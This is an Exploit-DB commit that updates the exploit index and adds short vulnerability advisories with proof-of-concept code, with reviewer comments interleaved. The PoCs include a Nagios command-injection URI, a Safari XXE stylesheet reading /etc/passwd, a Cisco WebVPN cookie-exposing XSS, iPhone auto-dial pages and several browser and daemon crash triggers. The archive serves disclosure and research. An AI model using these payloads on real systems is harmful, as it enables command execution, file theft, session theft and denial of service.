Updated 04_28_2014

Offensive Security 2014-04-28 04:36:23 +00:00
parent a6e2fc1461
commit ebb723c8e7
47 changed files with 524 additions and 30 deletions


@ -9508,7 +9508,7 @@ id,file,description,date,author,platform,type,port
10204,platforms/windows/dos/10204.txt,"Foxit Reader COM Objects Memory Corruption Remote Code Execution Vulnerability",2009-11-19,mrx,windows,dos,0
10205,platforms/multiple/dos/10205.txt,"LibTIFF 'LZWDecodeCompat()' Remote Buffer Underflow Vulnerability",2009-11-12,wololo,multiple,dos,0
10206,platforms/linux/dos/10206.txt,"Expat 2.0.1 UTF-8 Character XML Parsing Remote Denial of Service Vulnerability",2009-11-12,"Peter Valchev",linux,dos,0
10207,platforms/multiple/local/10207.txt,"VMWare Virtual 8086 Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0
10207,platforms/multiple/local/10207.txt,"VMWare Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0
10208,platforms/windows/dos/10208.txt,"Firefox + Adobe Memory Corruption PoC",2009-10-14,Skylined,windows,dos,0
10209,platforms//webapps/10209.txt,"Everfocus <= 1.4 EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",,webapps,0
10210,platforms/windows/dos/10210.txt,"Internet Explorer 6/7 CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0
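Review bot: the 10209 context row two lines below the edited 10207 entry has an empty platform column and a doubled slash in its path (platforms//webapps/10209.txt), so the file column does not resolve to a real directory; since this hunk is already normalizing rows in this region, fix that row's platform and path in the same pass.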
@ -9611,7 +9611,7 @@ id,file,description,date,author,platform,type,port
10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0
10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0
10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0
10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0
10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0
10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0
10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection Vulnerability",2009-12-06,SadHaCkEr,php,webapps,0
10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal Vulnerability",2009-12-06,mr_me,windows,webapps,0
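Review bot: the 10329 context row carries a trailing space in its author field ("cr4wl3r "), which will surface as a distinct author value in anything that groups by that column; trim it while this region is being touched. The 10327 change itself (inserting " - " between product and issue) follows the separator convention the newer rows already use.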
@ -18043,7 +18043,7 @@ id,file,description,date,author,platform,type,port
20751,platforms/solaris/local/20751.txt,"Solaris 7.0/8 IPCS Timezone Buffer Overflow Vulnerability",2001-04-12,"Riley Hassell",solaris,local,0
20752,platforms/cgi/remote/20752.txt,"NCM Content Management System content.pl Input Validation Vulnerability",2001-04-13,"RA-Soft Security",cgi,remote,0
20753,platforms/cgi/remote/20753.txt,"IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,remote,0
20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0
20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 - Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0
20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0
20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0
20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - LFI",2012-08-23,CorryL,php,webapps,0
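Review bot: the 20760 context row has a typo in its description, "(VM Applicance)" for "(VM Appliance)"; worth correcting alongside the 20758 separator change since it sits in the same hunk.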
@ -29771,4 +29771,30 @@ id,file,description,date,author,platform,type,port
33026,platforms/ios/webapps/33026.txt,"Depot WiFi 1.0.0 iOS - Multiple Vulnerabilities",2014-04-25,Vulnerability-Lab,ios,webapps,0
33027,platforms/windows/remote/33027.py,"Kolibri 2.0 GET Request - Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)",2014-04-26,"jiko jawad",php,webapps,0
33030,platforms/php/webapps/33030.txt,"ApPHP MicroBlog 1.0.1 - Multiple Vulnerability (LFI/RCE)",2014-04-26,JiKo,php,webapps,0
33031,platforms/linux/dos/33031.html,"Mozilla Firefox 3.0.x Large GIF File Background Denial of Service Vulnerability",2009-05-10,"Ahmad Muammar",linux,dos,0
33032,platforms/linux/remote/33032.txt,"'Compress::Raw::Zlib' Perl Module - Remote Code Execution Vulnerability",2009-05-11,"Leo Bergolth",linux,remote,0
33033,platforms/multiple/remote/33033.html,"WebKit JavaScript 'onload()' Event Cross Domain Scripting Vulnerability",2009-05-08,"Michal Zalewski",multiple,remote,0
33034,platforms/linux/remote/33034.txt,"WebKit XML External Entity Information Disclosure Vulnerability",2009-05-08,"Chris Evans",linux,remote,0
33035,platforms/windows/remote/33035.txt,"Microsoft Windows Media Player 11 ScriptCommand Multiple Information Disclosure Vulnerabilities",2009-05-12,"Rosario Valotta",windows,remote,0
33036,platforms/linux/dos/33036.txt,"Git <= 1.6.3 Parameter Processing Remote Denial Of Service Vulnerability",2009-05-05,"Shawn O. Pearce",linux,dos,0
33037,platforms/multiple/dos/33037.html,"Apple QuickTime <= 7.4.1 NULL Pointer Dereference Denial of Service Vulnerability",2009-05-14,"Thierry Zoller",multiple,dos,0
33038,platforms/php/webapps/33038.txt,"Webmedia Explorer 5.0.9/5.10 Multiple Cross Site Scripting Vulnerabilities",2009-05-15,intern0t,php,webapps,0
33039,platforms/linux/remote/33039.txt,"Mozilla Firefox <= 3.0.10 and SeaMonkey <= 1.1.16 Address Bar URI Spoofing Vulnerability",2009-05-11,"Pavel Cvrcek",linux,remote,0
33040,platforms/linux/dos/33040.txt,"GUPnP 0.12.7 Message Handling Denial Of Service Vulnerability",2009-05-03,"Zeeshan Ali",linux,dos,0
33041,platforms/linux/dos/33041.txt,"Irssi <= 0.8.13 'WALLOPS' Message Off By One Heap Memory Corruption Vulnerability",2009-05-15,nemo,linux,dos,0
33042,platforms/linux/dos/33042.txt,"Mozilla Firefox <= 3.0.10 'nsViewManager.cpp' Denial of Service Vulnerability",2009-05-11,"Bret McMillan",linux,dos,0
33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x '/proc/iomem' Sparc64 Local Denial of Service Vulnerability",2009-05-03,"Mikulas Patocka",linux,dos,0
33044,platforms/hardware/remote/33044.html,"Apple iPhone <= 2.2.1 Call Approval Dialog Security Bypass Vulnerability (1)",2009-05-17,"Collin Mulliner",hardware,remote,0
33045,platforms/hardware/remote/33045.html,"Apple iPhone <= 2.2.1 Call Approval Dialog Security Bypass Vulnerability (2)",2009-05-17,"Collin Mulliner",hardware,remote,0
33046,platforms/hardware/remote/33046.html,"Apple iPhone <= 2.2.1 Call Approval Dialog Security Bypass Vulnerability (3)",2009-05-17,"Collin Mulliner",hardware,remote,0
33047,platforms/multiple/remote/33047.html,"WebKit 'parent/top' Cross Domain Scripting Vulnerability",2009-05-19,"Gareth Hayes",multiple,remote,0
33048,platforms/java/webapps/33048.txt,"DirectAdmin <= 1.33.6 'CMD_REDIRECT' Cross-Site Scripting Vulnerability",2009-05-19,r0t,java,webapps,0
33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow Vulnerability",2009-05-21,wololo,linux,dos,0
33050,platforms/windows/remote/33050.html,"Microsoft Internet Explorer 7/8 HTML Attribute JavaScript URI Security Bypass Vulnerability",2009-05-22,80vul,windows,remote,0
33051,platforms/cgi/remote/33051.txt,"Nagios <= 3.0.6 'statuswml.cgi' Remote Arbitrary Shell Command Injection Vulnerability",2009-05-22,Paul,cgi,remote,0
33052,platforms/php/webapps/33052.txt,"Basic Analysis And Security Engine <= 1.2.4 'readRoleCookie()' Authentication Bypass Vulnerability",2009-05-23,"Tim Medin",php,webapps,0
33053,platforms/linux/remote/33053.txt,"Samba <= 3.3.5 Format String And Security Bypass Vulnerabilities",2009-05-19,"Jeremy Allison",linux,remote,0
33054,platforms/hardware/remote/33054.txt,"Cisco Adaptive Security Appliance 8.x Web VPN FTP or CIFS Authentication Form Phishing Vulnerability",2009-05-24,"David Byrne",hardware,remote,0
33055,platforms/hardware/remote/33055.html,"Cisco ASA Appliance 8.x WebVPN DOM Wrapper Cross Site Scripting Vulnerability",2009-05-24,"Trustwave's SpiderLabs",hardware,remote,0
33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC",2014-04-27,st3n,windows,dos,0
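Review bot: the new 33049 row ("LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow Vulnerability", wololo) describes the same function and author as the existing 10205 row earlier in this file, so it reads as a duplicate entry rather than a new exploit; either cross-reference the two or drop one. Separately, 33056's port column is 0 although the script it indexes connects to port 8014 (and 33027 in the same hunk records 80 for its HTTP target), so 8014 would be the consistent value.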


@ -49,5 +49,5 @@ FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Exploit: http://www.exploit-db.com/sploits/19520.zip
Exploit-DB mirror: http://www.exploit-db.com/sploits/19520.zip

platforms/cgi/remote/33051.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35464/info
Nagios is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
NOTE: For an exploit to succeed, access to the WAP interface's ping feature must be allowed.
Versions prior to Nagios 3.1.1 are vulnerable.
The following example URI is available:
https://www.example.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH
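Review bot: the affected-version statement ("Versions prior to Nagios 3.1.1 are vulnerable") does not agree with the CSV title for 33051, which caps it at "<= 3.0.6"; pick one, since 3.1.0 falls inside the first range and outside the second. The example also uses a real public address (173.45.235.65) as the ping target where a documentation address would do, and nothing says that %3B is the URL-encoded ";" that terminates the ping argument and starts the injected command, which is the one thing a reader needs to see.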


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <iframe src="sms:+12345" WIDTH=50 HEIGHT=10></iframe> <iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe> <!-- second iframe is to attack quick users who manage to close the first call-dialog //--> <iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe> </body> </html>
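Review bot: the description says the bypass is of Mail's call-approval dialog, but the PoC is a Safari page (its title says so) that auto-dials through tel: and sms: iframes; state which application the PoC targets, or note that the three-line description is the BID summary and that this file is the Safari variant. The same description text is repeated verbatim in 33045 and 33046, so a one-line note on how each variant differs would help more than the shared boilerplate.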


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> <meta http-equiv="refresh" content="0; URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt"> </head> <body> <script lang=javascript> function a() { document.write("<iframe src=\"tel:+12345\" WIDTH=50 HEIGHT=10></iframe>"); } setTimeout("a()", 100); </script> </body> </html>
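Review bot: the meta refresh points at a real third-party URL (maps.google.de with a street address in Darmstadt); replace it with a placeholder such as www.example.com, as the other files in this commit do, since the redirect target is incidental to the bug. Also, "<script lang=javascript>" is not the standard attribute (it is "type", or the legacy "language"); browsers execute the script anyway because unknown attributes are ignored, but a comment saying so would save the next reader a check.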


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35425/info
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> </head> <body> <script lang=javascript> l = "<iframe src=\"sms:"; for (i = 0; i < 10000; i++) { l = l + "3340948034298232"; } l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+12345\" height=10 width=10></iframe>"; document.write(l); </script> </body> </html>
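Review bot: nothing in the file says what the 160,000-digit sms: URI built by the loop (10000 copies of a 16-digit string) is for; since the surrounding text is identical to 33044 and 33045, the reader cannot tell how this variant differs from the plain iframe version other than by the loop. Add a line describing the intended effect of the oversized sms: frame before the tel: frame fires.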


@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/35475/info
Cisco Adaptive Security Appliance (ASA) is prone to a vulnerability that can aid in phishing attacks.
An attacker can exploit this issue to display a fake login window that's visually similar to the device's login window, which may mislead users.
This issue is tracked by Cisco Bug ID CSCsy80709.
The attacker can exploit this issue to set up phishing attacks. Successful exploits could aid in further attacks.
Versions prior to ASA 8.0.4.34 and 8.1.2.25 are vulnerable.
The following example is available:
/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a
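Review bot: the example path is given with no explanation of the path= value; the hex string decodes to "sgc.rknzcyr.pbz", which is ROT13 for "ftp.example.com", so the parameter is an attacker-chosen ftp:// host handed to the file browser's init, which is what produces the fake login window the description mentions. Say that in a line above the URI and drop the double obfuscation, since it hides the one thing the reader needs to see. The sentences "An attacker can exploit this issue to display a fake login window ..." and "The attacker can exploit this issue to set up phishing attacks ..." also say the same thing twice.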


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35476/info
Cisco ASA (Adaptive Security Appliance) is prone to a cross-site scripting vulnerability because its Web VPN fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
This issue is documented by Cisco Bug ID CSCsy80694.
Cisco ASA 8.0.(4), 8.1.2, and 8.2.1 are vulnerable.
<html><script> function a(b, c) { return "alert('Your VPN location:\\n\\n'+" + "document.location+'\\n\\n\\n\\n\\n" + "Your VPN cookie:\\n\\n'+document.cookie);"; } CSCO_WebVPN['process'] = a; csco_wrap_js(''); </script></html>
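Review bot: the PoC calls CSCO_WebVPN['process'] and csco_wrap_js('') without defining either, so as a standalone HTML file it throws a ReferenceError; it only works when the page is fetched through the ASA's WebVPN content rewriter, which is where the csco_/CSCO_ symbols come from. That precondition (host the file externally and open it through the clientless VPN portal) belongs in the description, together with a note that the overwritten "process" hook is what the wrapper invokes on the wrapped script.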


@ -44,4 +44,4 @@ http://alguienenlafisi.blogspot.com
Root-Node
Exploit: http://www.exploit-db.com/sploits/29959.nse
Exploit-DB mirror: http://www.exploit-db.com/sploits/29959.nse


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35450/info
DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
DirectAdmin 1.33.6 and prior versions are affected.
http://www.example.com:2222/CMD_REDIRECT?view=advanced&sort1%22%3E%3Cscript%3Ealert(111);%3C/script%3E=1&domain=www.example2.com
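Review bot: the injection point here is unusual and undocumented: the payload sits in a parameter name (sort1"><script>...=1), not in a value, and it is the name that is reflected into the page. One sentence stating that would make the single URI self-explanatory, and the CVE-style "affected versions" line should say whether the fix landed in 1.33.7 or later, since "1.33.6 and prior" leaves the upper bound open.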


@ -61,4 +61,4 @@ Remote attackers may leverage this issue to cause denial-of-service conditions.
NOTE: BibTeX may be shipped with various packages, such as TeTeX or TexLive, that may also be vulnerable.
Exploit: http://www.exploit-db.com/sploits/2009-11-22-bibtex-crash.tar.bz2
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-bibtex-crash.tar.bz2

platforms/linux/dos/33031.html Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35280/info
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.
Firefox 3.0.10 is affected; other versions may also be vulnerable.
<!-- Firefox 3.0.10 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) http://y3dips.echo.or.id //--> <html> <head> <title>Firefox Exploit</title> <body background="exploit.gif"> </body> </html>
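Review bot: the PoC references exploit.gif as the body background, but no GIF is included in the commit and no mirror link is given; without the crafted large GIF this HTML is just a blank page. Attach the file (or a mirror URL, as 33049 and 33032 do) or describe how to generate it; the CSV title says only "Large GIF File Background".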

platforms/linux/dos/33036.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/35338/info
Git is prone to a denial-of-service vulnerability because it fails to properly handle some client requests.
Attackers can exploit this issue to cause a daemon process to enter an infinite loop. Repeated exploits may consume excessive system resources, resulting in a denial-of-service condition.
Git 1.4.4.5 through 1.6.3.2 are vulnerable; other versions may also be affected.
$ perl -e '
$s="git-upload-pack git\0user=me\0host=localhost\0";
printf "%4.4x%s",4+length $s,$s
' | nc $GITHOST 9418
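Review bot: the snippet does not say what makes the request malicious: it is an ordinary pkt-line (4-hex-digit length prefix that counts itself, then the payload) whose git-upload-pack line carries an extra NUL-separated "user=me" field ahead of "host=localhost", which is the non-standard part the daemon is said to mishandle. State that, note that GITHOST must be set in the environment first, and say that nc is expected to hang rather than return, since it is the daemon side that enters the loop.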

platforms/linux/dos/33040.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35390/info
GUPnP is prone to a vulnerability that remote attackers may exploit to cause denial-of-service conditions.
Versions prior to GUPnP 0.12.8 are affected.
======== ACTION MESSAGE ==========
POST /Dimming/Control HTTP/1.1 SOAPAction: "urn:schemas-upnp-org:service:Dimming:1#GetLoadLevelStatus"
Host: www.example.com:41615 Content-Type: text/xml
Content-Length: 0
==================================
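Review bot: as shown here the request cannot be replayed: the request line and the SOAPAction header share one line, as do Host and Content-Type, whereas each must be on its own CRLF-terminated line. Make sure the file has one header per line, and say that the trigger is the empty SOAP body (Content-Length: 0) for a GetLoadLevelStatus action, since that is the only thing distinguishing it from a legitimate control request.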

platforms/linux/dos/33041.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35399/info
Irssi is prone to an off-by-one, heap-based, memory-corruption vulnerability because it fails to properly bounds-check user-supplied data before copying it into a memory buffer.
Attackers can exploit this issue to crash the vulnerable client, resulting in a denial-of-service condition. Given the nature of this issue, attackers may also be able to run arbitrary code within the context of the vulnerable application, but this has not been confirmed.
Iirssi 0.8.13 is vulnerable; other versions may also be affected.
The following example IRC command is available; please see the references for more information.
: WALLOPS \001ACTION
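Review bot: "Iirssi" in the version line is a typo for "Irssi". The example line is something a server sends to the client (a WALLOPS whose text is a CTCP ACTION opened with \001 but never closed), not a command a user types, so it needs a note that it has to come from a malicious or compromised IRC server, matching the description's "crash the vulnerable client".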

platforms/linux/dos/33042.txt Executable file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/35413/info
Mozilla Firefox is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions.
Firefox 3.0.2 through 3.0.10 are vulnerable.
Start Firefox
Open new tab
Go to a space
Open "Create a new document" in a new tab
Click Continue (Write a New Document)
Enter any name for the document like "test123" for the document
Switch to HTML
Paste attached HTML as the content
Click Publish
Quit Firefox & click "Save and Quit"
(edit sequence:)
Start Firefox (which should open two tabs from previous session)
Click OK to any authentication windows that pop up.
Click to focus on the second tab
Click on "Edit document" link
*CRASH*
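Review bot: the step "Paste attached HTML as the content" refers to an attachment that is not in this commit, and "Go to a space" and "Create a new document" assume a particular wiki application that is never named; without the HTML and the application, the sequence cannot be reproduced. Add the HTML (or a mirror link) and name the web application the crash was observed against.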

platforms/linux/dos/33043.txt Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35415/info
The Linux kernel is prone to a local denial-of-service vulnerability that attackers can exploit to cause an affected computer to crash.
This issue affects the Linux kernel 2.6.22-rc1 through 2.6.29 on the sparc64 architecture.
The following example command is available:
cat /proc/iomem

platforms/linux/dos/33049.txt Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35451/info
LibTIFF is prone to a remote buffer-underflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
An attacker can exploit this issue to execute arbitrary malicious code in the context of a user running an application that uses the affected library. Failed exploit attempts will likely crash the application.
LibTIFF 3.8.2 is vulnerable; other versions may be affected as well.
http://www.exploit-db.com/sploits/33049.zip
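Review bot: the mirror link is a bare URL; every other archive reference in this commit is being relabelled to "Exploit-DB mirror: ...", so this new file should use the same label from the start rather than needing the same cleanup later.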


@ -18,4 +18,4 @@ This is a generic exploit for 64-bit nginx which uses a new attack technique (BR
Exploit: http://www.exploit-db.com/sploits/32277.tgz
Exploit-DB mirror: http://www.exploit-db.com/sploits/32277.tgz


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/35307/info
The 'Compress::Raw::Zlib' Perl module is prone to a remote code-execution vulnerability.
Successful exploits may allow remote attackers to execute arbitrary code or cause denial-of-service conditions in applications that use the vulnerable module.
Versions prior to 'Compress::Raw::Zlib' 2.017 are affected.
http://www.exploit-db.com/sploits/33032.tar.gz
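Review bot: the text says "execute arbitrary code or cause denial-of-service" but not what the tarball actually contains (a crashing compressed input, a harness that drives the module, a patch?), so a reader cannot judge the entry from this file alone; add a one-line summary of the archive contents, and give the link the "Exploit-DB mirror:" prefix the commit is standardizing on.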


@ -0,0 +1,48 @@
source: http://www.securityfocus.com/bid/35321/info
WebKit is prone to a remote information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information that may aid in further attacks.
NOTE: This issue was previously covered in BID 35260 (Apple Safari Prior to 4.0 Multiple Security Vulnerabilities), but has been assigned its own record to better document it.
Safari prior to version 4 may permit an evil web page to steal files
from the local system.
This is accomplished by mounting an XXE attack against the parsing of
the XSL XML. This is best explained with a sample evil XSL file which
includes a DTD that attempts the XXE attack:
<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ] >
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
Below you should see the content of a local file, stolen by this evil web page.
<p/>
&ent;
<script>
alert(document.body.innerHTML);
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
To mount the attack, the attacker would serve a web page which has XML
MIME type and requests to be styled by the evil stylesheet:
<?xml version="1.0" encoding="ISO-8859-1"?>
<?xml-stylesheet type="text/xsl" href="safaristealfilebug.xsl"?>
<xml>
irrelevant
</xml>
Full technical details: http://scary.beasts.org/security/CESA-2009-006.html
Blog post: http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)
Cheers
Chris
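Review bot: the XML references its stylesheet as safaristealfilebug.xsl, but the XSL block above is never given that filename, and nothing says the two must be served from the same origin for the xml-stylesheet link to resolve; add both so the two halves can be saved and served as-is. The trailing "Cheers / Chris" is mailing-list signature text that does not belong in the PoC file.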


@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/35388/info
Mozilla Firefox and SeaMonkey are affected by a URI-spoofing vulnerability because they fail to adequately handle user-supplied data.
An attacker may leverage this issue by inserting arbitrary content to spoof a URI presented to an unsuspecting user. This may lead to a false sense of trust because the victim may be presented with a URI of a seemingly trusted site while interacting with the attacker's malicious site.
Versions *prior to* the following are affected:
Firefox 3.0.11
SeaMonkey 1.1.17
NOTE: This issue was previously covered in BID 35326 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2009-24 through -32 Multiple Remote Vulnerabilities), but has been assigned its own record to better document it.
The following example URI is available:
https://www.example.xn--com-edoaaaaaaaaaaaaaaaaaaaaaaaaaaaa.example2.org/
This URI would be decoded as 'www.example.com' followed by multiple 'U+115a' characters and '.example2.org'.
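Review bot: the last line explains how the Punycode label decodes but not why that spoofs anything; the file never says how the run of U+115A characters is rendered in the address bar on an affected build, which is the whole point. Add a sentence on what the user actually sees, and make explicit that example2.org is the domain the victim is really on while the visible prefix reads as www.example.com.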


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35472/info
Samba is prone to multiple vulnerabilities.
Attackers can leverage these issues to execute arbitrary code within the context of the vulnerable application or to bypass certain security restrictions.
Samba 3.0.31 through 3.3.5 are affected.
The following proof of concept is available:
smb: \> put aa%3Fbb
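Review bot: the description names two distinct issues (a format string and a security bypass) but the one-line PoC is not tied to either; a filename containing a "%" sequence handed to "put" points at the format-string case, and it is the smbclient side that parses that name. Say which issue this line exercises and which component is expected to crash, since "context of the vulnerable application" is ambiguous between client and server.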


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/35359/info
Apple QuickTime is prone to a denial-of-service vulnerability.
Note that an attacker will exploit this issue through the Safari browser by enticing a user to visit a malicious site. This will crash the user's browser.
Successful exploits may allow the attacker to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
<html>
<video src=%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n>Video</video>
</html>
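Review bot: the payload is a run of %n format specifiers in the video src attribute, which is the shape of a format-string trigger, while the CSV entry for 33037 is titled "NULL Pointer Dereference Denial of Service"; reconcile the title with the PoC or explain why a %n chain ends in a NULL dereference. The file also omits the affected-version line the other BID-derived files carry; the CSV says Apple QuickTime <= 7.4.1.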


@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401
VMWare ESX Server 3.5 ESX350-200910401
VMWare ACE 2.5.3 Build 185404
Exploit: http://www.exploit-db.com/sploits/2009-11-22-vmware86.tar.gz
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-11-22-vmware86.tar.gz


@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56
Ghostscript Ghostscript 8.54
Ghostscript Ghostscript 8.15
Exploit: http://www.exploit-db.com/sploits/2009-12-05-34340.ps
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-12-05-34340.ps


@ -146,5 +146,5 @@ Avaya Intuity AUDIX LX 2.0
Avaya Intuity AUDIX LX 1.0
Avaya Intuity AUDIX
Exploit: http://www.exploit-db.com/sploits/2009-12-05-34337.pdf
Exploit-DB mirror: http://www.exploit-db.com/sploits/2009-12-05-34337.pdf


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/35315/info
WebKit is prone to a cross-domain scripting vulnerability because it fails to properly restrict the access of JavaScript code when loading new webpages.
A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or to launch spoofing attacks against other sites. Other attacks are also possible.
NOTE: This issue was previously covered in BID 35260 (Apple Safari Prior to 4.0 Multiple Security Vulnerabilities), but has been assigned its own record to better document it.
<html> <body onunload='intercept()'> <script> function intercept() { setTimeout('update_page()',10); stop(); } function update_page() { document.getElementById('hideme').style.visibility = "hidden"; document.getElementById('showme').style.visibility = "visible"; document.getElementById('sitename').innerHTML = document.location; } </script> <span id=showme style="visibility: hidden"> <font size=+1 color=teal>This is a spoofed version of <b><span id=sitename></span></b></font> </span> <br> <span id=hideme>Please navigate away from this page.</span>
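Review bot: as shown here the markup ends after the second span with no closing body or html tags, and the effect the code produces (stop() inside onunload aborts the outgoing navigation, then update_page() rewrites the stale page to display whatever document.location now reports) is a location spoof, which the description's "cross-domain scripting / same-origin bypass" wording does not convey. Complete the markup and add a line describing what the user sees after navigating away.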


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/35441/info
WebKit is prone to a cross-domain scripting vulnerability.
A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or launch spoofing attacks against other sites. Other attacks are also possible.
<iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe>
